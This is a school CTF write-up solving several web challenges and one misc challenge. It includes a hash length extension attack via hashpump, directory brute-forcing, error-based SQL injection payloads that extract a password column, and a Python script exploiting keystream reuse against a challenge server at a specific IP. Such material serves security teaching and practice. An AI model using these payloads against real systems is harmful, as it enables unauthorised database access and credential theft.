School CTF writeup


web

1.warmup-web

Look at the response headers: they reveal the path /NOTHERE.
Visiting that path gives the flag.

2.web1

Viewing the page source gives:

<?php
$flag = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
$secret = "xxxxxxxxxxxxxxxxxxxxxxxxxxx"; // guess it length :)
$username = $_POST["username"];
$password = $_POST["password"];
$cookie = $_COOKIE['albert'];
if (!empty($_COOKIE['albert'])) {
    if (urldecode($username) === "admin" && urldecode($password) !== "admin") {
        // the cookie is a plain md5(secret . data) digest, so it can be length-extended
        if ($_COOKIE['albert'] === md5($secret . urldecode($username . $password))) {
            echo "Congratulations! here is your flag.\n";
            die("The flag is " . $flag);
        } else {
            die("Cookie Not Correct");
        }
    } else {
        die("Go AWAY");
    }
}
setcookie("sample-hash", md5($secret . urldecode("admin" . "admin")), time() + (60 * 60 * 24 * 7));
?>
<!--  -->

From the challenge it is easy to see this is a hash length extension attack.
I used hashpump on Kali. The secret length was unknown at first, but brute-forcing it shows the length is 26.

>> hashpump
Input Signature: 968c31570a2a3afa076112687ecca974
Input Data: admin
Input Key Length: 26
Input Data to Add: pcat

3.web2

For this one I simply ran DirBuster on Kali.
The directory scan found:
/x/index.php
/.php
/x/register.php
/x/connect.php
/x/login.php
/flag.php
The final answer is in /flag.php.

4.web4

A simple error-based injection challenge.
Intercept the request with Burp and modify the id parameter.
The final payload is:

id=1%27 and extractvalue(1,concat(0x5c,(select password from albertchang),0x5c,1))%23
or alternatively:
id=-1%27 or extractvalue(1,concat(0x5c,(select password from albertchang),0x5c,1))%23

After the result comes back:

Following the hint, you need to POST flag = Th3_Pas3W0rd_i3_Albertchang

This gives the flag.

5.web6

On getting this challenge I went straight to analysing the page source
and found a hidden HTML section.

That gave away the point of the challenge:
a stream cipher is just a bit-by-bit XOR.
The hidden part contains the flag after it has been XORed.

The flag is longer than 500 characters,
so I constructed a submitted parameter longer than 500 characters and XORed it bit by bit with the message.
The script is as follows.
One pitfall here: when I requested the page with requests I could not get the hidden HTML content,
so I had to use httplib instead.

# yz:2016.12.25
# -*- coding:utf-8 -*-
import httplib, urllib

# Chosen plaintext: a run of '1's longer than the flag, so it covers the whole keystream
data = urllib.urlencode({'arg': '11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111'})
conn = httplib.HTTPConnection("45.32.58.123:12223")
headers = {"Content-Type": "application/x-www-form-urlencoded",
           "Connection": "Keep-Alive", "Referer": ":12223/"}
conn.request(method="POST", url="/main.php", body=data, headers=headers)
s = conn.getresponse()
content = str(s.read())
# Message: the server's ciphertext for our input, returned as \x-escaped hex
Message = content[content.index("Message:")+9:content.index("<!-- Flag Here")-6]
Message = Message.replace(r'\x', "")
Message = int(Message, 16)
# Flag: the XORed flag hidden in the HTML comment
Flag = content[content.index("Here")+5:content.index("--></body>")]
s = ''
# convert to a string of 0/1 bits
for i in Flag:
    temp = ord(i)
    temp = bin(temp)
    temp = str(temp)[2:]
    if len(temp) < 8:
        temp = '0'*(8-len(temp)) + temp
    s += temp
Flag = int(s, 2)
# the submitted '111...' string as an integer, same bit layout as Flag
src = 200686490938213618932925030686723900966346071385575706818931139925151927414142413276833387391430903367465157760813819133574082739102368183356464973743987837722948595492712901641873403594450204695713629139533103392519371071099952645246840782481900957871935637359154437252913405444179654300427180044691385965990823568106696476515287748546363867017174091051797450964111012257685851865814304288305868868796070362487761893449386893361922901844324634350334616783957894220005538964792468979405328145100453460098854853839989027847783206845004095945185162744506591411155318233223679027298329085177274095914773286471049161702613799175486411492003372288722716950913877957802694948679785419083224812096387329082981115878996013259272222472356069166820222490810121435442820722489119884073056358155724651716232802987659573867435059545130785856458655309902770151770043405778785036718566031651260115600041084237592155873140867644089767487877289411629787419400386757597222832981129288874883921314078446307643819572105712219875309974530695306897012252757579812647497998317030864635355185457048473443750962962325959236879327971895179877812488472241671023567097665713934032193125740463764283516105833757192335092325954137896621052635084041994822566883633L
# the keystream is reused, so flag_ct ^ our_ct ^ our_plaintext == flag
end = Flag ^ Message ^ src
s = str(hex(end))[2:][:-1]
string = ''
for i in range(0, len(s), 2):
    string += chr(int(s[i:i+2], 16))
print string
conn.close()

Finally we get:
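As an added example (not the writeup's own script), here is the same keystream-reuse recovery the web6 script performs, written in Python 3 on bytes instead of big integers, with a constructed flag and keystream standing in for the server's; parse_hex_message assumes the Message field is \x-escaped hex, as the script's replace of '\x' suggests. It also shows the edge case the writeup works around: a chosen message shorter than the flag only recovers a prefix.

```python
import os


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings over their common length (the stream-cipher primitive)."""
    return bytes(x ^ y for x, y in zip(a, b))


def stream_encrypt(keystream: bytes, plaintext: bytes) -> bytes:
    """Stand-in for the web6 server: ciphertext = plaintext XOR keystream."""
    if len(keystream) < len(plaintext):
        raise ValueError("keystream shorter than plaintext")
    return xor_bytes(plaintext, keystream)


def parse_hex_message(escaped: str) -> bytes:
    """Turn a \\x41\\x42-style escaped hex string (assumed Message format) into bytes."""
    return bytes.fromhex(escaped.replace(r"\x", ""))


def recover_flag(flag_ct: bytes, chosen_pt: bytes, chosen_ct: bytes) -> bytes:
    """Keystream reuse: flag_ct ^ chosen_ct ^ chosen_pt == flag over the overlap.

    Only bytes covered by the chosen plaintext can be recovered, which is why the
    writeup submits an argument longer than the flag (more than 500 characters).
    """
    n = min(len(flag_ct), len(chosen_pt), len(chosen_ct))
    return xor_bytes(xor_bytes(flag_ct[:n], chosen_ct[:n]), chosen_pt[:n])


def demo():
    """Constructed scenario: a fake flag and a random keystream, not the real server's."""
    flag = b"flag{constructed_example_flag_for_demo}"
    keystream = os.urandom(64)
    flag_ct = stream_encrypt(keystream, flag)
    # A chosen message shorter than the flag recovers only a prefix.
    short_pt = b"1" * 8
    partial = recover_flag(flag_ct, short_pt, stream_encrypt(keystream, short_pt))
    # A chosen message at least as long as the flag recovers it completely.
    long_pt = b"1" * 64
    full = recover_flag(flag_ct, long_pt, stream_encrypt(keystream, long_pt))
    return partial, full, flag


if __name__ == "__main__":
    partial, full, flag = demo()
    print(partial, full == flag)
```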

misc

1.warmup-misc

s = 'UAUSAB1QUFBQUFAbfQ=='

def decode(s, k):
    # base64-decode, then XOR every byte with the single-character key k
    r = s.decode('base64')
    l = ''
    assert len(k) == 1
    for i in r:
        l = l + chr(ord(i) ^ ord(k))
    return l[:-1]

Published: 2024-01-31 06:22:31
